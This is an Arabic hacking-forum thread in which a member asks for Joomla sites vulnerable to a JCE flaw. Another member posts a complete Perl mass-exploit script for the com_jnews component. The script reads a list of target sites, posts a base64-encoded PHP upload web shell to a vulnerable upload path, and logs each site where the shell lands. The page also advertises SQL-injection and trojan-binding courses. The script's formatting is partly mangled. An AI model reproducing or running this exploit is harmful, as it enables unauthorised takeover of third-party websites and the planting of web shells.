1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

ممكن مواقع جوملة مصابة بتغرة jce

الموضوع في 'مشاكل / حلول' بواسطة Erorr Salawi 404, بتاريخ ‏28 يوليو 2014.

كاتب الموضوع : Erorr Salawi 404 المشاهدات : 631 الردود : 5 ‏28 يوليو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Erorr Salawi 404
    DeveloPer Plus

    عضو منذ:
    ‏7 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    ممكن مواقع جوملة مصابة بتغرة jce لانني لم اجدها وايضا الدوركات لا تعمل بدون جدوا
     


    جاري تحميل الصفحة...
  2. غير متصل

    Pro.Mast3r
    V • I • P

    عضو منذ:
    ‏13 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    Pentester
    الإقامة:

    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي

    • اولا : الموضوع في القسم الخطأ .

    • ثانيا : ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP

    • حاول تجد ثغرات اخرى مثل RCI , SQL .
     


  3. غير متصل

    TeePlow
    V • I • P

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:

    رد: ممكن مواقع جوملة مصابة بتغرة jce

    السلام عليكم
    ينقل للقسم الصحيح
    ثانيا مثل ما قال الاخ :
    ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP
     


  4. غير متصل

    Erorr Salawi 404
    DeveloPer Plus

    عضو منذ:
    ‏7 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اوكي وكيف استغل تغرة rci
     


  5. غير متصل

    Pro.Mast3r
    V • I • P

    عضو منذ:
    ‏13 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    Pentester
    الإقامة:

    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي ثغرات عباره عن استغلال امري
    يعني تستطيع تنفيذ امر عن طريقها
    ومايفيدك هو امر الاستدعاء
    wget

    والثغره منتشره في اضافات الجوملا

    مثل

    • com_jnewsletter
    هذه اداه بيرل
    لااستغلال الثغره
    كود PHP:
    #!/usr/bin/perl
    # Module Needed :)
    use strict;
    no warnings;
    use 
    threads;
    use 
    threads::shared;
    use 
    LWP::UserAgent;
    use 
    HTTP::Request;
    use 
    LWP::Simple;
    use 
    HTTP::Request::Common;
    use 
    Term::ANSIColor;
    use 
    Win32::Console::ANSI;
    use 
    MIME::Base64;
    ##############################
    if($^=~ /Win/){
    system("cls");
    }else{
    system("clear");
    }
    my $ua LWP::UserAgent->new;
    $ua->timeout(15);
    $ua->agent('Mozilla/5.0');
    print 
    color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
    print 
    color("bold red"),"[+] coded by Mr_AnarShi-T\n";
    print 
    color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
    print 
    color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
    print 
    color 'reset';
    print 
    color("green"),"[+] Enter File : ";
    print 
    color 'reset';
    my $file=<STDIN>;
    chomp($file);
    print 
    color("green"),"\n[+] Enter Thread Number : ";
    print 
    color 'reset';
    my $thread=<STDIN>;
    chomp($thread);
    my $threads $thread;
    my @linkz shared;
    my @paths shared;
    GetLinks();
    while (
    threads->list) {}
    print 
    color ('green');
    print 
    "\n[+] Link Founded : ";
    print 
    color 'reset';
    print
    "".scalar(@linkz)."\n\n";
    CheckLinks();
    while (
    threads->list) {}
    sub GetLinks {
    openLNK"$file) or die "$!\n";
    while( 
    definedmy $line_ = <LNK> ) ) {
    chomp$line_ );
    push( @linkz$line_ );
    }
    closeLNK );
    }
    sub CheckLinks {
    foreach 
    my $link( @linkz ) {
    my $ctr 0;
    foreach 
    my $thr threads->list ) { $ctr++; }
    if (
    $ctr $threads){
    threads->create( \&CheckLinkz_exploits,$link );
    }
    else { 
    redo; }
    }
    }
    sub CheckLinkz_exploits {
    my $link shift ;
    chomp ($link);
    my $site_vul "http://".$link "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
    my $encoded "PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgTXJfQW5hclNoaS1UIDwvdGl0bGU+JzsNCmVj​aG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRh​dGEiIG5hbWU9InVwbG9hZGVyDQoiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJm​aWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIN​CmlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAi​VXBsb2FkIiApIHsNCiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAk​X0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnDQo8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9i​Pjxicj48YnI+JzsgfQ0KICAgICAgICBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWxlZCAhISE8L2I+​PGJyPjxicj4nOyB9DQp9DQo/Pg==";
    my $evil decode_base64($encoded);
    my $res $ua->request(POST $site_vul,Content_Type => 'text/plain'Content => $evil);
    print 
    "[+] Checking $link\n\n";
    if (
    $res->is_success){
    print 
    "[+] $link is vul\n";
    print 
    "[+] Checking If The Evil code Was Uploded\n";
    my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
    my $url "http://".$link$vul;
    my $request HTTP::Request->new(GET=>$url);
    my $useragent LWP::UserAgent->new();
    my $response $useragent->request($request);
    if (
    $response->content=~m/<title>Upload Files Mr_AnarShi-<\/title>/g){
    print 
    color("yellow"),"[.] Found => $url\n\n";
    print 
    color 'reset';
    open(BEN,">>result-$link.txt");
    print 
    BEN "$url\n";
    close(BEN);
    }
    else
    {
    print 
    "[.] Not Found \n";
    }
    }
    threads->detach();
    موفق .~
     


  6. غير متصل

    sєиɪσя нσssαм ★ Abu Nabil ★
    V • I • P

    عضو منذ:
    ‏11 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: ممكن مواقع جوملة مصابة بتغرة jce

    يتم آختيآر آفضل رد لعدم آهتمآم العضو بآلطلب المطروح
    بعد آذن الجميع يغلق الموضوع للآنتهآء
    )5:"
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...